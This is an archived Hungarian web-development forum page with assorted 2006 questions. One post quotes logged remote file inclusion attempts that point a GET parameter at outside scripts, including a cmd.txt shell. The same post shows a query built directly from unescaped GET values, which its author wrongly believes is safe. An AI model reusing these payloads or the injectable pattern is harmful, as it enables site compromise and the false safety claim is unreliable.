ugrás a tartalomhoz

Archívum - Jún 25, 2006 - Fórum téma

URL automatikusan linké tétele

Anonymous · 2006. Jún. 25. (V), 23.43
Üdv,

A témával kapcsoaltban kerestem, két fórumtémát is találtam, egyik a http://weblabor.hu/forumok/temak/10778, másikban pedig a http://hu.php.net/manual/hu/ref.regex.php oldalt javasolták. Googlet is használtam, de nem találtam megoldást.

A címben bennevan mit szeretnék, de azért leírom. Fórumomban azt szeretném hogy ha beírnak pl egy címet http://xy.hu akkor azt sqlbe már <a href=".. -ként szúrja be.

Köszönöm segítségeket!
 

mysqld fut nagytömegben

saxus · 2006. Jún. 25. (V), 19.02
# ps ax |grep mysqld
4056 ? S 0:01 /usr/local/mysql/libexec/mysqld

van valakinek tippje, hogy miért futhat ebből 41 darab?
 

kijelölés-csere szövegdobozban

a.d.a.m · 2006. Jún. 25. (V), 16.14
Sziasztok!

Ahhoz szeretnék ötleteket kapni, hogy miként lehetne megvalósítani azt, hogy egy szövegdobozban kijelölt szöveget - mondjuk egy gombra való kattintás után - pár karakterrel (teszem azt az elejére és a végére beszúrva azt hogy <i>) módosítsak anélkül, hogy a doboz további tartalmán változtatna? Ó, és mindezt php-ben v. javascriptben. Úgy emlékszem ActiveScriptben működik a dolog, de számomra a flash most nem megoldás.
Előre is köszönöm!

a.d.a.m
 

Több lapos nyomtatás X irányban???

vereb1 · 2006. Jún. 25. (V), 14.21
Sziasztok!

Meg tudja valaki mondani, hogy hogyan lehet egy több lap széles dokumentumot kinyomtatni, mert hiába probálkozom nekem csak 1 oldalt sikerül.
 

JS rákérdezés törlés előtt

ballor · 2006. Jún. 25. (V), 13.31
Sajnos nem értek a JS-hez, ezért kérem segítségeteket

a problémám a következő: van egy oldal, ahonnan lehet törölni elemeket, olyat szeretnék létrehozni amivel megoldható, hogy egy kis ablakban rákérdezzen hogy "valóban törölni akarod?", persze itt lenne mégse gomb, ha meggondolná magát a páciens, ha okézza, akkor meg a hajtsa végre

eddig ilyet használtam:

function valaszt(KERDES, HOVA)
	{
	var answer=confirm(KERDES)
		if (answer)
			window.location=HOVA
	}
a HTML-ben meg ilyesmit használtam:
<a href='JavaScript:valaszt(\"Valóban törölni akarod a(z) [".$nev."] linket?\",\"/box/linktorles/".$boxid."/".$idje."\")' title='Törlés'>del</a>
ez ugyan megcsinálja, de a validátor hibát lát benne az A elem nem megfelelő használata miatt

ha így használom, akkor nem jelez hibát, ez elfogadható?
<a href='#' onclick='valaszt(\"Valóban törölni akarod a(z) [".$nev."] linket?\",\"/box/linktorles/".$boxid."/".$idje."\")' title='Törlés'>
előre is köszönöm a segítséget, hátha tudtok erre jobbat, szebbet, diszkrétebbet
 

Az open nevű GET paraméteremmel trükköznek hackerek az oldalamon

s_volenszki · 2006. Jún. 25. (V), 11.58
Sziasztok!

Szertnék tőletek véleményt, és tanácsot kétni!
A minap vettem észre az oldalam látogatói statisztikájában, hogy néhány okostojás, nem igazán arra használná a weboldalamat, amire az való!

Az oldal dinamikus tartalomból épül fe, úgy, hogy az index.php kap 3 értéket.
Pl.: A kezdő lap az ugye index.php, de ha valaki megnyit egy menüpontot és azon belül kiválaszt egy szolgáltatást akkor:

index.php?open=Menüpont&prodclassname=Faguriga

Az odal statisztikám figyeli azt, hogy ezek a változók milyen értékeket vesznek fel (statisztikázva ezzel a termékcsoportok látogatottságát), és az elmúlt két napban ezeket vettem észre:

index.php?open:http://ibank.glwb.info/mayer.jpg?
index.php?open:http://otravesso.100free.com/cmd.txt?

Ha megnézitek, láthatjátok, hogy az első, az egy adatbázis alapú levélküldő rutin,a második pedig egy valami szerver agyturka!

Nagyjából sejtem, hogy mi akar történni itt, de hogyan védekezzek ez ellen!

Az oldalak tartalma úgy keletkezik, hogy a $_GET-ből kiveszi az értékeket változóba, és azokkal a változókkal végrehajt egy adatbázis műveletet:
Sematikusan:

SELECT * FROM adattabla WHERE (open = $open) AND (prodclassname = $prodclassname)

Ezek alapján, azt gondolom, hogy híába próbál külső parancsot tenni a $_GET-be, mert a keletkező változó nem fordul elő a kódban úgy, hogy lefuthatna!

Mit gondoltok erről?

s_volenszki
 

javascript + css probléma ie-ben

krey · 2006. Jún. 25. (V), 02.04
Egy weblap fejlesztése során elég komoly problémában akadtam meg.
A program feladata, hogy a teljes bejegyzés (.entry) letöltése után javascript-tel lerövidítse és a tovább feliratra kattintáskor a felirat eltűnjön, a bejegyzés vége pedig elő.
Adott egy html fájl:
[colorer=html]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mi a francért nem működik?</title>
<script src="js.js" type="text/javascript"></script>
</head>
<body onload="init()">
<div class="entry">
<h3>Lorem Ipsum</h3>
<div class="entry-content">
<div class="entry-text">
<p>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Fusce euismod commodo ante. Curabitur risus massa, congue ac, hendrerit sit amet, pretium lobortis, eros. Pellentesque tincidunt faucibus ligula. Curabitur blandit facilisis felis. Nullam sed augue. Sed rutrum sodales arcu. Donec a nunc. Donec feugiat facilisis ligula. Cras lectus nulla, fringilla vel, feugiat ac, scelerisque sed, orci. Mauris vestibulum condimentum ipsum. Nullam nec nulla. Donec dignissim porttitor risus. Integer non arcu sed neque eleifend euismod. Praesent sapien sapien, aliquet eu, egestas at, posuere at, nulla. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Aenean venenatis dolor consequat ipsum. In nibh lorem, molestie at, sollicitudin commodo, malesuada vitae, ipsum. Duis pellentesque, quam eu laoreet pharetra, dolor augue pretium lacus, venenatis cursus nulla nulla quis ligula. Suspendisse potenti.
</p>
<p>
Donec eget risus sit amet enim ultricies lacinia. Nullam eget diam. Quisque metus lectus, ornare ac, consequat dignissim, venenatis non, ante. Nulla ullamcorper nibh vitae nisi. Sed pretium egestas tellus. Sed varius. Sed in arcu sit amet mi accumsan tincidunt. Morbi nonummy ante ac tortor ornare mollis. Praesent quam nisl, venenatis quis, fringilla ac, fringilla at, tellus. In eu nisl. Aliquam id elit. Curabitur congue velit ac arcu. Maecenas ornare mi at lectus vestibulum tristique. Vivamus nec diam ut risus rutrum porttitor. Pellentesque vulputate venenatis nisi. Donec pharetra. Pellentesque ut nibh ac nunc vulputate euismod. Cras leo arcu, volutpat quis, feugiat vel, laoreet vel, nibh. Praesent et urna id nulla pharetra vehicula.
</p>